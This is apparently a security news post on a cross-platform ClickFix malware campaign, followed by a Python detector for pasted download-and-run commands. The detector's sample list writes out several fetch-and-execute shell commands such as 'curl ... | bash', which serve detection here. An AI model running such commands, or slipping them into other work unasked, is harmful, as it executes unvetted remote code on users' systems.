"Watch Out! "ClickFix Returns Stronger: Cross-Platform Malware That Needs No Clicks to Strike"
Cybersecurity experts from c/side have uncovered a newly enhanced version of the ClickFix malware technique. Originally designed to exploit Windows systems, this method has now evolved to attack macOS, Android, and iOS devices as well.
The attack begins on a compromised website, where malicious JavaScript code is injected. When users interact with certain elements on the page, they're redirected to a fake URL shortener page. This page instructs them to copy and paste a link into their browser, which initiates a secondary redirection to a malicious download page.
The attack varies by operating system:
- macOS users are prompted to execute a terminal command that downloads and runs a malicious shell script—already recognized by multiple antivirus engines.
- Android and iOS users face a more dangerous threat: a drive-by download. Simply visiting the infected site causes a .TAR file containing malware to be downloaded—without any user interaction.
This shift marks a significant escalation in the threat’s reach and complexity. What started as a Windows-only threat has now become a cross-platform attack, showing how cybercriminals are adapting quickly to compromise a wider range of devices.
How to Protect Yourself:
- Avoid clicking on unknown links or ads
- Never paste commands from untrusted websites into your Terminal or command prompt
- Use up-to-date antivirus software with real-time protection
- Keep your software and operating system regularly updated
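
The macOS branch described above depends on a pasted command that downloads a shell script and runs it. The following Python check is an added example, not code from c/side or the original post: it flags the common download-and-run shapes in a command line, such as a shell-history entry or a process event from endpoint telemetry. The pattern set, the function names and the sample commands (which use the reserved `example.invalid` domain) are assumptions constructed for illustration.

```python
import re

FETCH = r"(?:curl|wget)"
# Shell name as its own word, so "shasum" or "update.sh" do not count.
SHELL = r"(?<![\w.-])(?:sh|bash|zsh)\b"

# Remote content piped straight into a shell: curl ... | sh
PIPE_TO_SHELL = re.compile(rf"\b{FETCH}\b[^|;&]*\|\s*(?:sudo\s+)?{SHELL}")
# Shell running the output of a fetch: bash -c "$(curl ...)"
SUBSTITUTION = re.compile(rf"{SHELL}\s+-c\s+[\"']?\s*(?:\$\(|`)\s*{FETCH}\b")
# Fetch saved to a file: curl -o PATH ... / wget -O PATH ...
SAVED_TO = re.compile(rf"\b{FETCH}\b[^|;&]*?\s-[oO]\s+([^\s;&|]+)")


def download_and_run(command):
    """Return a reason if the command fetches remote content and executes it, else None."""
    if PIPE_TO_SHELL.search(command):
        return "pipe-to-shell"
    if SUBSTITUTION.search(command):
        return "command-substitution"
    saved = SAVED_TO.search(command)
    if saved:
        path = re.escape(saved.group(1))
        rest = command[saved.end():]
        # The saved file is later handed to a shell or run directly.
        if re.search(rf"(?:{SHELL}\s+|(?:&&|;)\s*){path}(?:[\s;&]|$)", rest):
            return "save-then-execute"
    return None


def scan(commands):
    """Return (command, reason) for every flagged command line."""
    hits = ((c, download_and_run(c)) for c in commands)
    return [(c, reason) for c, reason in hits if reason]


# Constructed sample command lines, not taken from the campaign.
SAMPLES = [
    "curl -fsSL https://files.example.invalid/update.sh | bash",
    '/bin/bash -c "$(curl -fsSL https://files.example.invalid/install.sh)"',
    "curl -o /tmp/update.sh https://files.example.invalid/update.sh && chmod +x /tmp/update.sh && /tmp/update.sh",
    "curl -o /tmp/report.pdf https://files.example.invalid/report.pdf",
    "curl -sL https://files.example.invalid/pkg.tar | shasum -a 256",
]

if __name__ == "__main__":
    for command, reason in scan(SAMPLES):
        print(f"{reason}: {command}")
```

A match is a prompt for review rather than proof of compromise, since legitimate installers use the same command shapes.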